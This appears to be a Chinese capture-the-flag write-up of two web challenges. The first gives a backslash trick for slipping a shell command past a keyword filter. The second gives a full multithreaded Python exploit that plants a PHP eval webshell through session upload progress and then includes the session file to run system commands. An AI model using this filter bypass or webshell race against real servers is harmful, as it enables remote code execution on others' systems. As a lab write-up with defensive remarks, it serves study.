1、[UUCTF 2022 新生赛]ez_rce
所以构造 payload：code=printf(`l\s /`);，在输出里会发现一个目录 ffffffff???????，再构造一次 payload 即可得到 flag。（`l\s` 中的反斜杠会被 shell 去掉，实际执行的仍是 ls；推测题目对 ls 做了关键字过滤，这也说明黑名单式的命令过滤并不可靠。）
2、[第五空间 2021]EasyCleanup
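审计代码，一顿乱分析，在 phpinfo 里看到 session 上传进度功能（session.upload_progress）是开启的：上传过程中 PHP 会把 PHP_SESSION_UPLOAD_PROGRESS 字段的内容写进 session 临时文件。从下面脚本的 file 参数看，题目还会包含请求指定的文件，两者组合就成了条件竞争下的文件包含。防护上应避免把请求参数直接交给 include，不需要上传进度功能时关闭 session.upload_progress.enabled。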
ok上脚本
import io
import requests
import threading
from cffi.backend_ctypes import xrange
# Fixed session ID: write() sends it as the PHPSESSID cookie and read() uses it
# to build the session file name it asks the server for (/tmp/sess_<id>).
sessid = "0"
def write(session):
    """Post a multipart upload carrying an upload-progress field, forever.

    Every iteration sends a 50 KiB in-memory file named ``tgao.txt`` together
    with a ``PHP_SESSION_UPLOAD_PROGRESS`` form field and the fixed
    ``PHPSESSID`` cookie taken from the module-level ``sessid``.

    Background for readers: when ``session.upload_progress.enabled`` is on,
    PHP records progress data, including this field's value, in the session
    file while an upload is in flight. That is why the content of the session
    file becomes request-controlled for a short window. Repeated POSTs that
    carry this field with a constant session ID are a useful detection signal.

    Args:
        session: a ``requests`` session shared by all worker threads.

    NOTE(review): the loop has no exit condition and the request has no
    timeout, so each thread runs until the process is killed.
    """
    target = 'http://node4.anna.nssctf.cn:28335/'
    form_fields = {'PHP_SESSION_UPLOAD_PROGRESS': '<?php eval($_GET["cmd"]);?>'}
    while True:
        # A fresh buffer per request: the previous one has been read to EOF.
        filler = io.BytesIO(b'a' * 1024 * 50)
        session.post(
            target,
            data=form_fields,
            files={'file': ('tgao.txt', filler)},
            cookies={'PHPSESSID': sessid},
        )
def read(session):
    """Request the session file through the ``file`` parameter, forever.

    Each iteration POSTs to the target with ``file`` pointing at
    ``/tmp/sess_<sessid>`` and prints the response body when it contains the
    uploaded file name ``tgao.txt``; otherwise it prints a retry marker.

    Background for readers: the request only has an effect if the server
    passes the ``file`` parameter to an include-style call. Resolving that
    parameter against an allow-list, and keeping session storage out of any
    includable path, removes the primitive this loop depends on. Requests
    whose parameters reference ``sess_`` files are worth alerting on.

    Args:
        session: a ``requests`` session shared by all worker threads.

    NOTE(review): nothing visible in this script waits on or tests ``event``,
    so ``event.clear()`` does not stop any loop; the threads keep running
    after a match until the process is killed.
    """
    while True:
        url = f"http://node4.anna.nssctf.cn:28335/?mode=foo&file=/tmp/sess_{sessid}&cmd=system('cd /;ls;cat nssctfasdasdflag');"
        resp = session.post(url)
        if 'tgao.txt' not in resp.text:
            print("[+++++++++++++]retry")
            continue
        print(resp.text)
        event.clear()
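if __name__ == "__main__":
    # Module-level event that read() clears on a match.
    # NOTE(review): no thread in this script waits on or tests the event, so
    # set() below and clear() in read() have no visible effect on the workers.
    event = threading.Event()
    with requests.session() as session:
        # range(1, 30) yields 29 values: 29 writer threads and 29 reader
        # threads share one session. The builtin range replaces the `xrange`
        # name that the file imports from cffi.backend_ctypes, which looks
        # like an accidental IDE auto-import of a third-party internal.
        for _ in range(1, 30):
            threading.Thread(target=write, args=(session,)).start()
        for _ in range(1, 30):
            threading.Thread(target=read, args=(session,)).start()
    event.set()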